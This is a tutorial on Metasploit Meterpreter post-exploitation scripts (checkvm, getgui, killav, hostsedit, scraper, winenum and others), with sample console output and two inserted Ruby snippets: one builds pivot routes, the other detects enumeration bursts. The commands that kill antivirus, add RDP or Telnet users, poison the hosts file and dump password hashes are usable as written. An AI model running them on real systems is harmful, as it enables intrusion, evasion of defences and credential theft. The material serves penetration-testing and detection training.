Existing Meterpreter scripts in Metasploit

Metasploit scripts

Metasploit ships with a large number of useful scripts that help you work within the Metasploit Framework. These scripts were mostly written by third parties and were eventually incorporated into the project's Subversion repository (the project has since moved to Git). We will walk through some of them and show how to use them in your own penetration tests.

Meterpreter

The scripts below are meant to be used from a Meterpreter shell after a successful compromise of the target. Once you have a session on the target, you can use these scripts to best suit your needs. Note that Meterpreter scripts have been deprecated in favour of post-exploitation modules: wherever a script prints a "[!] Meterpreter scripts are deprecated" banner, the post module it names (for example post/windows/manage/enable_rdp) is the supported replacement and takes the same kind of options.

 

Contents

1. checkvm

2. getcountermeasure

3. getgui

4. get_local_subnets

5. gettelnet

6. hostsedit

7. killav

8. remotewinenum

9. scraper

10. winenum

 

1. checkvm

As its name suggests, the 'checkvm' script checks whether the exploited host is a virtual machine. This information can be very useful, for instance to tell whether you have landed in a lab or sandbox VM rather than on production hardware.

meterpreter > run checkvm  
 
 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
 [*] This is a VMware Workstation/Fusion Virtual Machine

 

2. getcountermeasure

The 'getcountermeasure' script checks the security configuration on the victim's system (the Windows built-in firewall profiles and the DEP policy, as shown below) and can disable other security measures such as A/V, the firewall, and more. Run without options it only reports; disabling anything requires its explicit switches and is a loud, easily logged change.

meterpreter > run getcountermeasure 
 
 [*] Running Getcountermeasure on the target... 
 [*] Checking for contermeasures...
 [*] Getting Windows Built in Firewall configuration...
 [*]    
 [*]     Domain profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]    
 [*]     Standard profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]    
 [*]     Local Area Connection 6 firewall configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]    
 [*] Checking DEP Support Policy...

 

3. getgui

The 'getgui' script is used to enable RDP (Remote Desktop Protocol) on the target system, optionally adding a local user to connect with.

meterpreter > run getgui 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or:    getgui -e

OPTIONS:

    -e   Enable RDP only.
    -f   Forward RDP connection.
    -h   Help menu.
    -p   The password of the user to add.
    -u   The username of the user to add.
 
 meterpreter > run getgui -e
 
 [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
 [*] Carlos Perez carlos_perez@darkoperator.com
 [*] Enabling Remote Desktop
 [*] RDP is already enabled
 [*] Setting Terminal Services service startup mode
 [*] Terminal Services service is already set to auto
 [*] Opening port in local firewall if necessary

 

4. get_local_subnets

The 'get_local_subnets' script is used to get the local subnets (network address and netmask) of the victim. This is very useful information to have when pivoting through the session into those networks.

 meterpreter > run get_local_subnets 
 
 Local subnet: 10.211.55.0/255.255.255.0
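As an added illustration that is not part of the original page or of the get_local_subnets script itself, the Ruby below derives the network address from each interface's IP and netmask (the same arithmetic the script performs on Meterpreter's interface list) and turns the result into the `route add` commands you would run to pivot through the session. The interface list is constructed sample data and the session id of 1 is an assumption.

```ruby
require 'ipaddr'

# Constructed interface list in the shape meterpreter's `ipconfig` reports.
# Sample data only; these are not addresses from a real host.
SAMPLE_INTERFACES = [
  { name: 'Software Loopback Interface 1', ip: '127.0.0.1',     netmask: '255.0.0.0' },
  { name: 'Local Area Connection 6',       ip: '10.211.55.128', netmask: '255.255.255.0' },
  { name: 'Local Area Connection 6',       ip: '10.211.55.129', netmask: '255.255.255.0' }, # secondary address, same subnet
  { name: 'Disconnected adapter',          ip: '0.0.0.0',       netmask: '0.0.0.0' },
  { name: 'VPN adapter',                   ip: '192.168.77.10', netmask: '255.255.255.128' },
].freeze

# Number of leading 1 bits in a dotted-quad netmask (255.255.255.0 -> 24).
def prefix_length(netmask)
  IPAddr.new(netmask).to_i.to_s(2).count('1')
end

# Derive "network/netmask" for each usable interface: loopback and unconfigured
# adapters are skipped and duplicate subnets (secondary addresses) are collapsed.
def local_subnets(interfaces)
  interfaces.each_with_object([]) do |iface, subnets|
    next if iface[:ip] == '0.0.0.0' || iface[:netmask] == '0.0.0.0'
    ip = IPAddr.new(iface[:ip])
    next if ip.loopback?
    network = ip.mask(prefix_length(iface[:netmask]))
    entry = "#{network}/#{iface[:netmask]}"
    subnets << entry unless subnets.include?(entry)
  end
end

# Meterpreter/msfconsole route syntax: route add <network> <netmask> <session id>
def route_commands(subnets, session_id)
  subnets.map do |entry|
    network, netmask = entry.split('/')
    "route add #{network} #{netmask} #{session_id}"
  end
end

if __FILE__ == $PROGRAM_NAME
  subnets = local_subnets(SAMPLE_INTERFACES)
  subnets.each { |s| puts "Local subnet: #{s}" }
  puts route_commands(subnets, 1)
end
```

The secondary address on "Local Area Connection 6" is collapsed into the one 10.211.55.0/255.255.255.0 route, and the loopback and unconfigured adapters produce no route at all, which is exactly what you want before pasting the commands into msfconsole.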

 

5. gettelnet

The 'gettelnet' script is used to enable the Telnet server on the victim when it is disabled, optionally adding a local user to log in with.

meterpreter > run gettelnet 
Windows Telnet Server Enabler Meterpreter Script
Usage: gettelnet -u <username> -p <password>

OPTIONS:

    -e   Enable the Telnet server only.
    -f   Forward Telnet connection.
    -h   Help menu.
    -p   The password of the user to add.
    -u   The username of the user to add.
 
 meterpreter > run gettelnet -e
 
 [*] Windows Telnet Server Enabler Meterpreter Script
 [*] Setting Telnet Server Services service startup mode
 [*] The Telnet Server Services service is not set to auto, changing it to auto ...
 [*] Opening port in local firewall if necessary

 

6. hostsedit

The 'hostsedit' Meterpreter script is used to add entries to the Windows hosts file. Since Windows checks the hosts file before the configured DNS server, this helps divert traffic to the fake entry or entries. Either a single entry can be supplied, or a series of entries from a file with one entry per line. As the run below shows, the script backs up the original hosts file alongside it and flushes the DNS resolver cache, both of which leave artifacts a defender can look for.

meterpreter > run hostsedit 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/inject_host.
[!] Example: run post/windows/manage/inject_host OPTION=value [...]
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.

OPTIONS:

    -e   Host entry in the format IP,hostname.
    -h   Help options.
    -l   Text file with a list of entries in the format IP,hostname, one per line.

Example:


run hostsedit -e 127.0.0.1,google.com

run hostsedit -l /tmp/fakednsentries.txt
 
 meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com
 [*] Making Backup of the hosts file.
 [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back
 [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162
 [*] Clearing the DNS Cache

 

7. killav

The 'killav' script can be used to disable most antivirus programs running as a service on the target. It works from a fixed list of AV process names; products that run as protected processes will not be terminated this way, and the attempt itself is likely to generate alerts.

meterpreter > run killav 
 
 [*] Killing Antivirus services on the target...
 [*] Killing off cmd.exe...

 

8. remotewinenum

The 'remotewinenum' script enumerates system information from a target host via wmic, using either supplied credentials or the ones the Meterpreter process is running under. Take note of where the logs are stored.

meterpreter > run remotewinenum

[!] Meterpreter scripts are deprecated. Try post/windows/gather/wmic_command.
[!] Example: run post/windows/gather/wmic_command OPTION=value [...]
Remote Windows Enumeration Meterpreter Script
This script will enumerate windows hosts in the target enviroment
given a username and password or using the credential under witch
Meterpeter is running using WMI wmic windows native tool.
Usage:

OPTIONS:

    -h   Help menu.
    -p   Password of the user on the target system.
    -t   Target address.
    -u   User on the target system (if none is provided, the process credentials are used).
 
 meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128
 
 [*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20170711.0142 
 [*] Running WMIC Commands ....
 [*]     running command wimic environment list
 [*]     running command wimic share list
 [*]     running command wimic nicconfig list
 [*]     running command wimic computersystem list
 [*]     running command wimic useraccount list
 [*]     running command wimic group list
 [*]     running command wimic sysaccount list
 [*]     running command wimic volume list brief
 [*]     running command wimic logicaldisk get description,filesystem,name,size
 [*]     running command wimic netlogin get name,lastlogon,badpasswordcount
 [*]     running command wimic netclient list brief
 [*]     running command wimic netuse get name,username,connectiontype,localname
 [*]     running command wimic share get name,path
 [*]     running command wimic nteventlog get path,filename,writeable
 [*]     running command wimic service list brief
 [*]     running command wimic process list brief
 [*]     running command wimic startup list full
 [*]     running command wimic rdtoggle list
 [*]     running command wimic product get name,version
 [*]     running command wimic qfe list

 

9. scraper

The 'scraper' script harvests more system information, including the entire registry. It also dumps password hashes, and it exports each hive to a temporary .reg file on the target before downloading it, as the paths in the output show.

meterpreter > run scraper
 
 [*] New session on 10.211.55.128:4444...
 [*] Gathering basic system information...
 [*] Dumping password hashes...
 [*] Obtaining the entire registry...
 [*] Exporting HKCU
 [*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)
 [*] Cleaning HKCU
 [*] Exporting HKLM
 [*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)

 

From the examples above we can see that we have many Meterpreter scripts for enumerating large amounts of information, disabling antivirus for us, enabling RDP, and much more.

 

10. winenum

The 'winenum' script provides a very detailed Windows enumeration tool. It dumps tokens, hashes and much more, and saves its report under ~/.msf4/logs/winenum/.

meterpreter > run winenum 
 
 [*] Running Windows Local Enumerion Meterpreter Script
 [*] New session on 10.211.55.128:4444...
 [*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt
 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
 [*]     This is a VMware Workstation/Fusion Virtual Machine 
 [*] Running Command List ...
 [*]     running command cmd.exe /c set
 [*]     running command arp -a
 [*]     running command ipconfig /all
 [*]     running command ipconfig /displaydns
 [*]     running command route print
 [*]     running command net view
 [*]     running command netstat -nao
 [*]     running command netstat -vb
 [*]     running command netstat -ns
 [*]     running command net accounts
 [*]     running command net accounts /domain
 [*]     running command net session
 [*]     running command net share
 [*]     running command net group
 [*]     running command net user
 [*]     running command net localgroup
 [*]     running command net localgroup administrators
 [*]     running command net group administrators
 [*]     running command net view /domain
 [*]     running command netsh firewall show config
 [*]     running command tasklist /svc
 [*]     running command tasklist /m
 [*]     running command gpresult /SCOPE COMPUTER /Z
 [*]     running command gpresult /SCOPE USER /Z
 [*] Running WMIC Commands ....
 [*]     running command wmic computersystem list brief
 [*]     running command wmic useraccount list
 [*]     running command wmic group list
 [*]     running command wmic service list brief
 [*]     running command wmic volume list brief
 [*]     running command wmic logicaldisk get description,filesystem,name,size
 [*]     running command wmic netlogin get name,lastlogon,badpasswordcount
 [*]     running command wmic netclient list brief
 [*]     running command wmic netuse get name,username,connectiontype,localname
 [*]     running command wmic share get name,path
 [*]     running command wmic nteventlog get path,filename,writeable
 [*]     running command wmic process list brief
 [*]     running command wmic startup list full
 [*]     running command wmic rdtoggle list
 [*]     running command wmic product get name,version
 [*]     running command wmic qfe
 [*] Extracting software list from registry
 [*] Finished Extraction of software list from registry
 [*] Dumping password hashes...
 [*] Hashes Dumped
 [*] Getting Tokens...
 [*] All tokens have been processed
 [*] Done!
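As an added example, not part of the original page or of the winenum/remotewinenum scripts, the Ruby below takes the defender's view of the command lists printed above: it scans constructed process-creation records (Sysmon Event ID 1 style; sample data) for a parent process that launches a burst of distinct recon commands within a short window, which is the footprint winenum leaves on the host and remotewinenum leaves on the machine it runs wmic from. The record format, the tool list and the thresholds are assumptions.

```ruby
require 'time'
require 'set'

# Binaries that winenum shells out to via `cmd.exe /c ...` (and that
# remotewinenum drives through wmic). Matched on image name only.
RECON_TOOLS = Set.new(%w[arp ipconfig route net netstat netsh tasklist gpresult wmic]).freeze

# Constructed process-creation records in the spirit of Sysmon Event ID 1:
# time, parent pid, and the child's command line. Sample data only.
SAMPLE_EVENTS = [
  { time: '2009-07-11T05:14:01Z', ppid: 1337, cmd: 'cmd.exe /c set' },
  { time: '2009-07-11T05:14:02Z', ppid: 1337, cmd: 'cmd.exe /c arp -a' },
  { time: '2009-07-11T05:14:03Z', ppid: 1337, cmd: 'cmd.exe /c ipconfig /all' },
  { time: '2009-07-11T05:14:04Z', ppid: 1337, cmd: 'cmd.exe /c ipconfig /displaydns' },
  { time: '2009-07-11T05:14:05Z', ppid: 1337, cmd: 'cmd.exe /c route print' },
  { time: '2009-07-11T05:14:06Z', ppid: 1337, cmd: 'cmd.exe /c net view' },
  { time: '2009-07-11T05:14:07Z', ppid: 1337, cmd: 'cmd.exe /c netstat -nao' },
  { time: '2009-07-11T05:14:08Z', ppid: 1337, cmd: 'cmd.exe /c net user' },
  { time: '2009-07-11T05:14:09Z', ppid: 1337, cmd: 'cmd.exe /c net localgroup administrators' },
  { time: '2009-07-11T05:14:20Z', ppid: 1337, cmd: 'cmd.exe /c wmic useraccount list' },
  # an administrator running a single command by hand should not alert
  { time: '2009-07-11T06:00:00Z', ppid: 4242, cmd: 'ipconfig /all' },
  { time: '2009-07-11T06:00:05Z', ppid: 4242, cmd: 'notepad.exe C:\\notes.txt' },
  # a few recon commands spread over ten minutes stay below the threshold
  { time: '2009-07-11T07:00:00Z', ppid: 5555, cmd: 'net user' },
  { time: '2009-07-11T07:05:00Z', ppid: 5555, cmd: 'net share' },
  { time: '2009-07-11T07:10:00Z', ppid: 5555, cmd: 'tasklist /svc' },
].freeze

# Normalise a command line: strip the `cmd.exe /c` wrapper and any path on the
# executable, and return [tool, normalised command] or nil if not a recon tool.
def recon_command(cmdline)
  body = cmdline.sub(/\Acmd(\.exe)?\s+\/c\s+/i, '').strip
  exe, *args = body.split
  return nil if exe.nil?
  tool = exe.downcase.split(/[\\\/]/).last.sub(/\.exe\z/, '')
  return nil unless RECON_TOOLS.include?(tool)
  [tool, ([tool] + args.map(&:downcase)).join(' ')]
end

# Flag a parent process that launches at least `threshold` distinct recon
# commands within `window` seconds. Returns one alert per offending parent.
def detect_enum_bursts(events, threshold: 5, window: 60)
  hits = events.map do |e|
    rc = recon_command(e[:cmd])
    rc && [Time.iso8601(e[:time]), e[:ppid], rc.last]
  end.compact
  hits.group_by { |_, ppid, _| ppid }.each_with_object([]) do |(ppid, rows), alerts|
    rows = rows.sort_by(&:first)
    rows.each_index do |i|
      t0 = rows[i].first
      span = rows[i..].take_while { |t, _, _| t - t0 <= window }   # sliding window from each hit
      distinct = span.map(&:last).uniq.size
      next if distinct < threshold
      alerts << { ppid: ppid, distinct_commands: distinct,
                  start: t0.iso8601, end: span.last.first.iso8601 }
      break
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  detect_enum_bursts(SAMPLE_EVENTS).each do |a|
    puts "ppid #{a[:ppid]} ran #{a[:distinct_commands]} distinct recon commands between #{a[:start]} and #{a[:end]}"
  end
end
```

Counting distinct normalised commands rather than raw events keeps a script that retries `net user` from inflating the score, and keying on the parent pid is what separates a burst driven from one injected process from an administrator typing a command or two at a console. Tune the threshold against your own baseline; the value of 5 in 60 seconds is an assumption, not a measured figure.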
Published: 2018-06-04 23:19:06  Category: Metasploit
Last updated: 2018-06-04 23:20:18
Author: 付杰